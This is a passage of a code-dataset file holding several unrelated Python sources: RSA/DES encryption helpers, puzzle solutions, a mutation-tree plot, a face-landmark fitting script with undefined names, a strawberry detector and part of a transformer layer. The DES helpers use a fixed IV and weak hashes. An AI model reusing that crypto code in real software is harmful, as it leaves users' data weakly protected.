base64.decodestring(s)\n    try:\n        return base64.b64decode(s)\n    except binascii.Error as e:\n        raise SyntaxError(e)\n    except binascii.Incomplete as e:\n        raise SyntaxError(e)\n\n\ndef stringToBase64(s):\n    return base64.encodestring(s).replace(\"\\n\", \"\")\n\n\ndef decrypt_with_rsa(msg, key):\n    '''\n    msg must be base64-encoded. Note: base64 data that has gone through URLDecoder may be corrupted, since '+' turns into ' '.\n    '''\n    msg = base64ToString(msg)\n    key = RSA.importKey(key)\n    cipher = PKCS1_v1_5_Cipher.new(key)\n\n    modBits = number.size(key.n)\n    k = ceil_div(modBits, 8)  # Convert from bits to bytes\n    print(\"K: \", k)\n\n    msglen = len(msg)\n    msg_encryted = \"\"\n    start_idx = 0\n    # handle over-long input chunk by chunk\n    while msglen > 0:\n        len1 = min([msglen, k])\n        cleartext = cipher.decrypt(msg[start_idx: (start_idx + len1)], \"\")\n        msg_encryted = msg_encryted + cleartext\n        start_idx = start_idx + len1\n        msglen = msglen - len1\n    return msg_encryted\n\n\ndef encrypt_with_rsa(msg, key):\n    '''\n    msg must be utf8-encoded\n    '''\n    msg = ensure_utf8(msg)\n\n    key = RSA.importKey(key)\n    cipher = PKCS1_v1_5_Cipher.new(key)\n\n    modBits = 
number.size(key.n)\n    k = ceil_div(modBits, 8) - 28  # 11 # Convert from bits to bytes\n    print(\"K: \", k)\n\n    msglen = len(msg)\n    msg_encryted = \"\"\n    start_idx = 0\n    # handle over-long input chunk by chunk\n    while msglen > 0:\n        len1 = min([msglen, k])\n        encrypt = cipher.encrypt(msg[start_idx: (start_idx + len1)])\n        msg_encryted = msg_encryted + encrypt\n        start_idx = start_idx + len1\n        msglen = msglen - len1\n    return stringToBase64(msg_encryted)\n\n\ndef check_with_rsa(msg, signature, key, method=\"SHA\"):\n    '''\n    Verify the signature using the _public_rsa_key defined in this file.\n    '''\n    signature = base64ToString(signature)\n    key = RSA.importKey(key)\n    if method == \"SHA\":\n        h = SHA.new(msg)\n    elif method == \"SHA256\":\n        h = SHA256.new(msg)\n    elif method == \"MD5\":\n        h = MD5.new(msg)\n    else:\n        h = SHA.new(msg)\n    verifier = PKCS1_v1_5.new(key)\n\n    return verifier.verify(h, signature)\n\n\ndef sign_with_rsa(msg, key, method=\"SHA\"):\n    '''\n    Sign msg with the _private_rsa_key defined in this file; returns a base64-encoded string.\n    '''\n    key = RSA.importKey(key)\n    if method == \"SHA\":\n        h = SHA.new(msg)\n    elif method == \"SHA256\":\n        h = SHA256.new(msg)\n    elif method == \"MD5\":\n        h = MD5.new(msg)\n    else:\n        h = SHA.new(msg)\n    signer = PKCS1_v1_5.new(key)\n    signature = signer.sign(h)\n    signature = stringToBase64(signature)\n    return signature\n\n\ndef split_rsa_key(key):\n    key = str(key)\n    return ''.join([('%s\\n' % s) if ((i + 1) % 64 == 0) else s for i, s in enumerate(key)])\n\n\ndef get_format_pubkey(key):\n    key = re.sub('\\s', '', key)\n    pub_key = split_rsa_key(key)\n    return public_key_tpl % pub_key\n\n\n# convert a public key string to an M2Crypto RSA object\ndef get_m2c_pub(pub_string):\n    return M2Crypto.RSA.load_pub_key_bio(M2Crypto.BIO.MemoryBuffer(pub_string))\n\n\n# decrypt data with the public key\ndef decrypt(data, m2c_pub, ilen=128):\n    _maxlength = ilen\n    data = data.decode(\"base64\")\n    l_dstr = \"\"\n    while len(data) > 0:\n        s = data[:_maxlength]\n        l_dstr += m2c_pub.public_decrypt(s, M2Crypto.RSA.pkcs1_padding)\n        data = data[_maxlength:]\n    return l_dstr\n\n\n# verify a signature with the public key\ndef pub_verify(data, sign, m2c_pub):\n    m = M2Crypto.EVP.MessageDigest('sha1')\n    m.update(data)\n    digest = m.final()\n    sign = sign.decode(\"base64\")\n    try:\n        return m2c_pub.verify(digest, sign, algo='sha1')\n    except:\n        return False\n\n\nfrom pyDes import des, CBC, PAD_PKCS5\n\n\ndef DesEncrypt(text, Des_Key):\n    Des_IV = \"12345678\"  # custom IV vector\n    k = des(Des_Key, mode=CBC, IV=Des_IV, pad=None, padmode=PAD_PKCS5)\n    EncryptStr = k.encrypt(text)\n    return base64.b64encode(EncryptStr)  # return base64-encoded\n\n\ndef DesDecrypt(text, Des_Key):\n    Des_IV = \"12345678\"  # custom IV vector\n    text = base64.b64decode(text)\n    k = des(Des_Key, mode=CBC, IV=Des_IV, pad=None, padmode=PAD_PKCS5)\n    return k.decrypt(text)\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/framework/utils/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"28483690894","text":"# https://leetcode.com/problems/island-perimeter/\n\nclass Solution:\n    def islandPerimeter(self, grid: List[List[int]]) -> int:\n        inBound = lambda r, c: 0 <= r < len(grid) and 0 <= c < len(grid[row])\n        neighbors = lambda r, c: [(r,c+1), (r,c-1), (r+1,c), (r-1,c)]\n        perimeter = 0\n\n        for row in range(len(grid)):\n            for col in range(len(grid[0])):\n                if grid[row][col] == 1:\n                    for r, c in neighbors(row, col):\n                        if not inBound(r, c) or grid[r][c] == 0:\n                            perimeter += 1\n\n        return perimeter\n
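\n    # Illustrative check (added note): for grid = [[1, 1], [1, 0]] the three\n    # land cells expose 4*3 - 2*2 = 8 sides, since each of the two shared\n    # edges hides one side on both adjacent cells.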
\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_45/island-perimeter.py","file_name":"island-perimeter.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74541069992","text":"import igraph\nimport pyarrow.parquet as pq\nimport numpy as np\nimport fire\n\ndef arrow_to_graph(path):\n df = pq.read_table(path).to_pandas()#.sort_values(\"mutationId\")\n vertex_mapping = dict( (mutationId, vertexId) for vertexId, mutationId in enumerate(df[\"mutationId\"]))\n is_root = np.array(df[\"ancestors\"].map(lambda x: len(x))) == 1\n graph = igraph.Graph()\n graph.add_vertices( len(vertex_mapping))\n links = list(zip(\n (vertex_mapping[x[-2]] for x in df[\"ancestors\"][~is_root]),\n (vertex_mapping[x] for x in df[\"mutationId\"][~is_root])\n ))\n graph.add_edges(links)\n graph.vs[\"mutationId\"] = df[\"mutationId\"]\n graph.vs[\"type_count\"] = df[\"typeCount\"]\n graph.vs[\"mutation_count\"] = df[\"mutationCount\"]\n graph.vs[vertex_mapping[1]]\n roots = np.where(is_root)\n return graph, roots[0]\n \ndef make_visual_style(graph):\n visual_style = {}\n visual_style[\"vertex_size\"] = (np.array(graph.vs[\"type_count\"])+1)**(1/4)\n visual_style[\"vertex_label\"] = graph.vs[\"mutationId\"]\n visual_style[\"margin\"] = 100\n return visual_style\n \ndef mutation_tree_plot(data_path, output_path):\n g, roots = arrow_to_graph(data_path)\n \n #g_layout = g.layout_reingold_tilford(root=[int(x) for x in roots])\n #visual_style = make_visual_style(g)\n\n #_ = igraph.plot(g, \n # output_path, \n # layout=g_layout, \n # inline=False, \n # bbox=(3840,1080), \n # **visual_style)\n \n h = g.subgraph( g.vs.select(mutation_count_gt=100000) )\n h_visual_style = make_visual_style(h)\n h_layout = h.layout_reingold_tilford(\"OUT\")\n\n _ = igraph.plot(h, \n output_path, \n layout=h_layout, \n inline=False, \n bbox=(3840,1080), \n **h_visual_style) \n \nif __name__ == \"__main__\":\n fire.Fire(mutation_tree_plot)","repo_name":"tozanski/SimBaD-analyzer","sub_path":"python/mutation_tree_plot.py","file_name":"mutation_tree_plot.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42697338951","text":"\"\"\"estimate facial geometry latent parameters α,δ and object transformation ω, t for a specific 2D image with a human face using Energy minimization.\"\"\"\nimport sys\nimport os\nimport dlib\nimport glob\nimport numpy as np\nfrom tqdm import tqdm, trange\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom data_def import Mesh\n\nfrom landmarks import file_landmarks, plot_landmarks\nfrom utils import load_data, load_landmarks, reconstruct_face\n# functions the same as their numpy versions\nfrom pinhole_camera import normalize, from_homogenous\n\nNEAR = torch.tensor([300.0])\nFAR = torch.tensor([2000.0])\nFOVY = torch.tensor([0.5])\nCAMERA_T = torch.tensor([0.0, 0.0, -400.0])\n\ndef to_homogenous(x):\n ones = torch.ones((x.shape[0], 1))\n return torch.cat((x.float(), ones), dim=1)\n\ndef apply_transform(x, M):\n return from_homogenous(torch.mm(M, to_homogenous(x).t()).t())\n\ndef construct_V(cx, cy):\n V = torch.tensor([[ cx, 0.0, 0.0, cx],\n [0.0, -cy, 0.0, cy],\n [0.0, 0.0, 0.5, 0.5],\n [0.0, 0.0, 0.0, 1.0]])\n return V\n\ndef construct_P(near, far, fovy, aspect_ratio):\n top = torch.tan(fovy / 2.0) * near\n right = top * aspect_ratio\n left = 
-right\n bottom = -top\n near_2 = 2 * near\n P = torch.tensor([\n [near_2, 0.0, right + left, 0.0],\n [0.0, near_2, top + bottom, 0.0],\n [0.0, 0.0, -(far + near), -near_2 * far],\n [0.0, 0.0, -1.0, 0.0],\n ])\n P /= torch.tensor([right - left, top - bottom, far - near, 1.0]).reshape(-1, 1)\n return P\n\ndef construct_R(theta_x, theta_y, theta_z):\n to_rad = lambda theta: theta * np.pi / 180.0\n theta_x = to_rad(theta_x)\n theta_y = to_rad(theta_y)\n theta_z = to_rad(theta_z)\n sin_x, cos_x = torch.sin(theta_x), torch.cos(theta_x)\n sin_y, cos_y = torch.sin(theta_y), torch.cos(theta_y)\n sin_z, cos_z = torch.sin(theta_z), torch.cos(theta_z)\n R_x = torch.tensor([\n [1., 0., 0.],\n [0., cos_x, -sin_x],\n [0., sin_x, cos_x],\n ])\n R_y = torch.tensor([\n [cos_y, 0., sin_y],\n [0., 1., 0.],\n [-sin_y, 0., cos_y],\n ])\n R_z = torch.tensor([\n [cos_z, -sin_z, 0.],\n [sin_z, cos_z, 0.],\n [0., 0., 1.],\n ])\n # 3x3\n R = torch.mm(R_z, torch.mm(R_y, R_x))\n # 4x4: extra zeroes\n R = torch.cat((torch.cat((R, torch.tensor([[0., 0., 0.]]).t()), dim=1), torch.tensor([[0., 0., 0., 1.]])), dim=0)\n return R\n\ndef construct_T(x, y, z):\n T = torch.eye(4)\n T = torch.cat((T[:,:-1], to_homogenous(torch.tensor([[x, y, z]])).t()), dim=1)\n return T\n\ndef construct_obj_to_cam(omega, t, resolution=(1.0, 1.0)):\n aspect_ratio = resolution[0] / float(resolution[1])\n T = construct_T(*list(t.t()))\n R = construct_R(*list(omega.t()))\n model_mat = torch.mm(T, R)\n view_mat = construct_T(*CAMERA_T)\n projection_mat = construct_P(NEAR, FAR, FOVY, aspect_ratio)\n viewport_mat = construct_V(resolution[0] / 2.0, resolution[1] / 2.0)\n M = torch.mm(viewport_mat, torch.mm(projection_mat, torch.mm(view_mat, model_mat)))\n return M\n\n\n\n\n# def rotation_matrix_y(y_deg):\n# \"\"\"Get the Y rotation matrix (https://bit.ly/2PQ8glW) for a given rotation angle (in degrees).\n# Assuming object translation to be 0.\n# \"\"\"\n# y_rad = y_deg / 180 * np.pi \n# R = torch.tensor([\n# [torch.cos(y_rad), 0., torch.sin(y_rad), 0.],\n# [0., 1., 0., 0.],\n# [-torch.sin(y_rad), 0., torch.cos(y_rad), 0.],\n# [0., 0., 0., 1.],\n# ]).float()\n# return R\n\n\n# def viewport_matrix(l=-1, r=1, t=1, b=-1):\n# \"\"\"\n# viewport matrix: http://glasnost.itcarlow.ie/~powerk/GeneralGraphicsNotes/projection/viewport_transformation.html\n# @param l: left\n# @param r: right\n# @param t: top\n# @param b: bottom\n# \"\"\"\n# w = r - l\n# h = t - b\n# V = .5 * torch.tensor([\n# [w, 0., 0., 0.],\n# [0., h, 0., 0.],\n# [0., 0., 1., 0.],\n# [r + l, t + b, 1., 2.],\n# ])\n# return V\n\n# def perspective_matrix(t, b, l, r, n, f):\n# \"\"\"\n# perspective projection matrix: https://bit.ly/300gYmf\n# @param t: top\n# @param b: bottom\n# @param l: left\n# @param r: right\n# @param n: near\n# @param f: far\n# \"\"\"\n# w = r - l\n# h = t - b\n# P = torch.tensor([\n# [2. * n / w, 0., 0., 0.],\n# [0., 2. * n / h, 0., 0.],\n# [(r + l) / w, (t + b) / h, -(f + n) / (f - n), -1.],\n# [0., 0., -2. 
* f * n / (f - n), 0.],\n#     ])\n#     return P\n\n\n# def project_points(S, near, R):\n#     \"\"\"project points following equation 2\"\"\"\n#     P = perspective_matrix(1, -1, 1, -1, near, 100)\n#     ones = torch.ones((S.shape[0], 1))\n#     S = torch.cat((S, ones), dim=1)\n#     V = viewport_matrix()\n#     p = V.t() @ P.t() @ R @ S.t()\n#     return p.t()\n\n\n# # project_face(torch.tensor([[1, 2, 3]]).float(), torch.tensor(90).float(), torch.tensor((0, 0, -200)))\n# def project_face(G, omega, t):\n#     (num_points, _) = G.shape\n#     S = torch.cat((G.t(), torch.ones((1, num_points))))\n#     R = rotation_matrix_y(omega)\n#     G_ = (R @ S)[:3].t()\n#     # R[3, 0:3] = t\n#     R = torch.cat((R[:3], torch.cat((t.float(), torch.tensor([1.]))).float().unsqueeze(dim=-1).t()))\n#     points = project_points(G_, near=1, R=R)\n#     return points\n\n\nclass Model(nn.Module):\n\n    def __init__(self, ground_truth, identity, expression, alpha=None, lambda_alpha=0.5, lambda_delta=0.5):\n        super(Model, self).__init__()\n        (n, _, _) = ground_truth.shape\n        self.n = n\n\n        # data\n        self.ground_truth = ground_truth.float()\n        self.identity = identity\n        self.expression = expression\n\n        # hyper-parameters\n        # TODO: Select hyper parameters such that α and δ are obtained in a proper range. Report findings.\n        self.lambda_alpha = lambda_alpha\n        self.lambda_delta = lambda_delta\n\n        # weight parameters\n        # initializing transformation parameters ω and t closer to the solution may help with convergence. For example, translation over the z dimension can be set to -400 in the case of a projection matrix with principal point {W/2, H/2} and fovy = 0.5.\n        # TODO: give np.random.uniform dimensions everywhere else as well?\n        self.alpha = alpha or nn.Parameter(torch.tensor(np.random.uniform(-1.0, 1.0, 30)).float())\n        self.delta = nn.Parameter(torch.tensor(np.random.uniform(-1.0, 1.0, (n, 20))).float())\n        self.omega = nn.Parameter(torch.tensor(np.random.uniform(0.0, 10.0, n)))\n        self.t = nn.Parameter(torch.cat((\n            # x/y\n            torch.tensor(np.random.uniform(-1.0, 1.0, (2, n))),\n            # z\n            torch.tensor(np.random.uniform(-400.0, 100.0, (1, n))),\n        )))\n\n    # , ground_truth, identity, expression, alpha, delta, omega, t\n    def forward(self):\n        \"\"\"calculate the loss for a specific 2D image with a human face\"\"\"\n\n        # self.G = reconstruct_face(self.identity, self.expression, self.alpha, self.delta)\n\n        # geom = self.identity .sample(self.alpha)\n        geom = torch.tensor(self.identity.mean) + torch.tensor(self.identity.pc) @ (self.alpha * torch.sqrt(torch.tensor(self.identity.std)))\n\n        L_fits = torch.zeros(self.n)\n        self.points = torch.zeros(self.n, 68, 4)\n        for i in range(self.n):\n            # expr = self.expression.sample(self.delta)\n            expr = torch.tensor(self.expression.mean) + torch.tensor(self.expression.pc) @ (self.delta[i] * torch.sqrt(torch.tensor(self.expression.std)))\n            G = geom + expr\n\n            # self.points[i] = project_face(G, self.omega[i], self.t[:, i])\n\n            R_l = construct_R(0, 10, 0)\n            geo_l = apply_transform(G, R_l)\n            im_l = geo_to_im(geo_l, texture, triangles)\n            resolution = tuple(im_l.shape[:2][::-1])\n            M = construct_obj_to_cam(self.omega[i], self.t[:, i], resolution)\n            self.points[i] = apply_transform(G, M)\n\n            # Given 68 ground truth facial landmarks the following energy can be optimized: L_fit = L_lan + L_reg (3), with L_lan = sum_{j=1}^{68} || p_{k_j} - l_j ||_2^2 (4), where p_{k_j} is a 2D projection of a landmark point k_j from Landmarks68_model2017-1_face12_nomouth.anl and l_j is its ground truth 2D coordinate.\n            L_lan = (self.points[i, :, 0:2] - self.ground_truth[i]).norm().pow(2).sum()\n            # We regularize the model using Tikhonov 
regularization to enforce the model to predict faces closer to the mean: L_reg = lambda_alpha * sum_{i=1}^{30} alpha_i^2 + lambda_delta * sum_{i=1}^{20} delta_i^2 (5)\n            L_reg = (self.lambda_alpha * self.alpha).pow(2).sum() + (self.lambda_delta * self.delta[i]).pow(2).sum()\n            L_fit = L_lan + L_reg\n            L_fits[i] = L_fit\n        return L_fits.mean()\n\ndef train_model(model):\n    lr = 0.1\n    optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n    # - Assuming α, δ, ω, t to be latent parameters of your model optimize an Energy described above using Adam optimizer until convergence.\n    prev_loss = 0\n    for i in trange(10000):\n        optimizer.zero_grad()\n        loss = model.forward()\n        print(i, loss)\n        loss.backward()\n        optimizer.step()\n        if (abs(prev_loss - loss.item()) < 0.1):\n            print(\"converged\")\n            break\n        prev_loss = loss.item()\n    return model\n\ndef estimate_points(files, identity, expression):\n    # landmarks = file_landmarks(f)\n    landmarks_pics = torch.stack(list(map(lambda f: torch.tensor(file_landmarks(f)), files)))\n    # (n, m, xy)\n    # print(landmarks)\n    model = Model(landmarks_pics, identity, expression)\n    model = train_model(model)\n    # print(model)\n    return model\n\ndef load_morphace():\n    # - Landmarks are a subset of vertices from the morphable model (indexes are defined by the annotation file provided), that's why you are inferring landmarks.\n    # load data, filter to 68 landmarks\n    # TODO: does this clash with the 30/20 filter?\n    vertex_idxs = load_landmarks()\n    (texture, identity, expression, triangles) = load_data()\n    for pca in (identity, expression, texture):\n        pca.mean = pca.mean[vertex_idxs]\n        pca.pc = pca.pc [vertex_idxs]\n    return (texture, identity, expression, triangles)\n\nif __name__ == \"__main__\":\n    (texture, identity, expression, triangles) = load_morphace()\n\n    # get pic landmarks\n    faces_folder_path = 'pics'\n    files = glob.glob(os.path.join(faces_folder_path, \"*.jpg\"))\n    # landmarks = file_landmarks(f)\n    # ground_truths = list(map(file_landmarks, tqdm(files)))\n    models = list(map(lambda f: estimate_points([f], identity, expression), tqdm(files)))\n\n    landmarks_pics = [x.points.detach().numpy().squeeze() for x in models]\n\n    # Visualize predicted landmarks overlayed on ground truth.\n    for landmarks, fpath in zip(landmarks_pics, files):\n        ground_truth = file_landmarks(fpath)\n        print('plotting')\n        plot_landmarks([ground_truth, landmarks])\n        print('plotted')\n        plt.savefig('results/estimation_' + os.path.basename(fpath))\n\n    alpha = models[0].alpha.detach().numpy()\n    delta = models[0].delta.detach().numpy()\n    print(alpha, delta)","repo_name":"KiaraGrouwstra/CV2_Assignment3","sub_path":"latent_param_estimation.py","file_name":"latent_param_estimation.py","file_ext":"py","file_size_in_byte":11211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30484469857","text":"from functools import total_ordering\nfrom utils import parse\nimport ast\nimport math\nfrom functools import cmp_to_key\n\n\ndef is_lower(f, s):\n    # both integer\n    if type(f) == int and type(s) == int:\n        return (f < s) - (f > s)\n    # both list\n    if type(f) == list and type(s) == list:\n        for a, b in zip(f, s):\n            comp = is_lower(a, b)\n            if comp:\n                return comp\n        return (len(f) < len(s)) - (len(f) > len(s))\n    # int and list\n    if type(f) == int and type(s) == list:\n        return is_lower([f], s)\n    if type(f) == list and type(s) == int:\n        return is_lower(f, [s])\n\n\ndef day13_1():\n    data = parse(13)\n    res = 0\n    for p, i in enumerate(range(0, len(data), 3)):\n        first = ast.literal_eval(data[i])\n        second = ast.literal_eval(data[i + 
1])\n\n        if is_lower(first, second) == 1:\n            res += p + 1\n    return res\n\n\nprint(day13_1())\n\n\ndef day13_2():\n    dividers = [[[2]], [[6]]]\n    packets = [ast.literal_eval(row) for row in parse(13) if row] + dividers\n    packets.sort(key=cmp_to_key(is_lower), reverse=True)\n    return math.prod(packets.index(x) + 1 for x in dividers)\n\n\nprint(day13_2())\n","repo_name":"zhugejun/Advent_of_Code","sub_path":"2022/python/day_13.py","file_name":"day_13.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40847616942","text":"import os\nimport torch\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport cv2\nimport numpy as np\nimport math\nfrom PIL import Image\nfrom torchvision import transforms as T\n \n\n\ndef init_model():\n    num_classes = 2\n    model = __get_instance_segmentation_model(num_classes)\n    model.load_state_dict(torch.load('rcnn_demo.pt'))\n    model.eval()\n    return model\n\ndef crop_image(img, x1, y1, x2, y2):\n    min_x = min(x1, x2)\n    max_x = max(x1, x2)\n    min_y = min(y1, y2)\n    max_y = max(y1, y2)\n    return img[min_y:max_y, min_x:max_x]\n\ndef distance(c1, c0):\n    r1, g1, b1 = map(lambda x: x / 255.0, c1)\n    r2, g2, b2 = map(lambda x: x / 255.0, c0)\n    distance = math.sqrt((r2-r1)**2+(g2-g1)**2+(b2-b1)**2)\n    return distance\n\ndef ripeness(mean_color):\n    ripe_color = (136, 23, 13)\n    ripeness = min(1.0, (1.0 - distance(ripe_color, mean_color)) / 0.9)\n    return ripeness\n\ndef crop_image(img, x1, y1, x2, y2):\n    min_x = min(x1, x2)\n    max_x = max(x1, x2)\n    min_y = min(y1, y2)\n    max_y = max(y1, y2)\n    return img[min_y:max_y, min_x:max_x, :]\n\ndef unique_count_app(a):\n    colors, count = np.unique(a.reshape(-1,a.shape[-1]), axis=0, return_counts=True)\n    return colors[count.argmax()]\n\ndef strawberry_ripeness(img):\n    img = crop_image(img, int(img.shape[0]/3), int(img.shape[1]/3), int(2*img.shape[0]/3), int(2*img.shape[1]/3))\n    img_hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n    color = unique_count_app(img)\n    return ripeness(color)\n    \ndef detect_strawberry(picture_path, model):\n    print('Loaded')\n    \n    img = __load_img(picture_path)\n    img.max()\n    \n    transforms = T.Compose([T.ToPILImage(),\n                            T.Resize((512, 512)),\n                            T.ToTensor()])\n    \n    img_tensor = transforms(img)\n    \n    with torch.no_grad():\n        prediction = model(img_tensor[None])\n    \n    scale1 = img.shape[1] / img_tensor.shape[2]\n    scale2 = img.shape[0] / img_tensor.shape[1]\n    print(scale1, scale2)\n    \n    # draw results\n    res = img.astype(np.uint8).copy()\n    \n    boxes = prediction[0]['boxes']\n    scores = prediction[0]['scores']\n    print(boxes, scores)\n    \n    font = cv2.FONT_HERSHEY_SIMPLEX\n    fontScale = 1.0\n    fontColor = (255, 0, 0)\n    thickness = 1\n    lineType = 1\n    \n    for box, score in zip(boxes, scores):\n        x1, y1, x2, y2 = box.cpu().numpy()\n        # upscale\n        x1 *= scale1\n        x2 *= scale1\n        y1 *= scale2\n        y2 *= scale2\n        if score > 0.9:\n            p1 = int(x1), int(y1)\n            p2 = int(x2), int(y2)\n            cv2.rectangle(res, p1, p2, (int(255 * score), 0, 0), 2)\n            ripeness = strawberry_ripeness(crop_image(res, int(x1), int(y1), int(x2), int(y2)))\n            cv2.putText(res, f\"{ripeness:.3f}\",\n                        p1,\n                        font,\n                        fontScale,\n                        fontColor,\n                        thickness,\n                        lineType)\n    \n    filename, ext = os.path.splitext(picture_path)\n    Image.fromarray(res).save(filename + '_detected.jpeg')\n    return filename + '_detected.jpeg'\n    \n    \ndef __get_instance_segmentation_model(num_classes):\n    # load an instance segmentation 
model pre-trained on COCO\n model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n \n # get number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n \n # now get the number of input features for the mask classifier\n in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n hidden_layer = 256\n # and replace the mask predictor with a new one\n model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n hidden_layer,\n num_classes)\n return model\n \n \ndef __load_img(path):\n img = Image.open(path).convert('RGB')\n return np.array(img)\n\nmodel = init_model()","repo_name":"InnokentyDM/strawberry-hack","sub_path":"app/ml.py","file_name":"ml.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17826357531","text":"import math\n\nimport torch\nimport torch.nn as nn\n\nfrom fairscale.nn.moe.moe_layer import MOELayer\nfrom fairscale.nn.moe.top2gate import Top2Gate\n\n\n# TODO(anj-s): Identify if we need this initialization logic for the below wrapped layers.\nclass EmbeddingLayer(nn.Embedding):\n \"\"\"Wrapped nn.Embedding layer to allow for weight initialization.\"\"\"\n\n def __init__(self, ntoken, ninp, initrange):\n super().__init__(ntoken, ninp)\n self.ninp_sqrt = math.sqrt(ninp)\n self.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, src):\n return super().forward(src) * self.ninp_sqrt\n\n\nclass PositionalEncodingLayer(nn.Module):\n \"\"\"PositionalEncoding layer for a given Transformer model.\"\"\"\n\n def __init__(self, d_model, dropout=0.1, max_len=5000):\n super(PositionalEncodingLayer, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x):\n x = x + self.pe[: x.size(0), :]\n return self.dropout(x)\n\n\nclass FeedForwardLayer(nn.Module):\n \"\"\"FeedForward layer for a given Transformer model.\"\"\"\n\n def __init__(self, d_model, dim_feedforward, activation, dropout) -> None:\n super(FeedForwardLayer, self).__init__()\n self.linear1 = nn.Linear(d_model, dim_feedforward)\n self.activation = activation\n self.dropout1 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model)\n self.dropout2 = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.dropout2(self.linear2(self.dropout1(self.activation(self.linear1(x)))))\n\n\n# Forked from https://pytorch.org/docs/stable/_modules/torch/nn/modules/transformer.html#TransformerEncoderLayer.\n# Parameters is_moe and num_local_experts are added.\nclass TransformerEncoderLayer(nn.Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. 
Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of the intermediate layer, can be a string\n            (\"relu\" or \"gelu\") or a unary callable. Default: relu\n        layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n        norm_first: if ``True``, layer norm is done prior to attention and feedforward\n            operations, respectively. Otherwise it's done after. Default: ``False`` (after).\n        is_moe: if ``True``, the feedforward layer will have MOE enabled.\n        num_local_experts: number of local experts for MOE.\n\n\n    Examples::\n        >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n        >>> src = torch.rand(10, 32, 512)\n        >>> out = encoder_layer(src)\n    \"\"\"\n    __constants__ = [\"norm_first\"]\n\n    def __init__(\n        self,\n        d_model,\n        nhead,\n        dim_feedforward=2048,\n        dropout=0.1,\n        activation=nn.ReLU(),\n        layer_norm_eps=1e-5,\n        norm_first=False,\n        is_moe=False,\n        num_local_experts=1,\n    ):\n        super(TransformerEncoderLayer, self).__init__()\n        self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)\n        self.norm_first = norm_first\n        self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps)\n        self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps)\n        self.dropout = nn.Dropout(dropout)\n\n        self.is_moe = is_moe\n        if is_moe:\n            world_size = 1 if not torch.distributed.is_initialized() else torch.distributed.get_world_size()\n            num_global_experts = num_local_experts * world_size\n            self.gate = Top2Gate(d_model, num_global_experts)\n            experts = nn.ModuleList(\n                [FeedForwardLayer(d_model, dim_feedforward, activation, dropout) for _ in range(num_local_experts)]\n            )\n            self.moe_layer = MOELayer(self.gate, experts)\n        else:\n            self.ff_block = FeedForwardLayer(d_model, dim_feedforward, activation, dropout)\n\n    def forward(self, src, src_mask=None, src_key_padding_mask=None):\n        r\"\"\"Pass the input through the encoder layer.\n\n        Args:\n            src: the sequence to the encoder layer (required).\n            src_mask: the mask for the src sequence (optional).\n            src_key_padding_mask: the mask for the src keys per batch (optional).\n\n        Shape:\n            see the docs in Transformer class.\n        \"\"\"\n\n        # see Fig. 
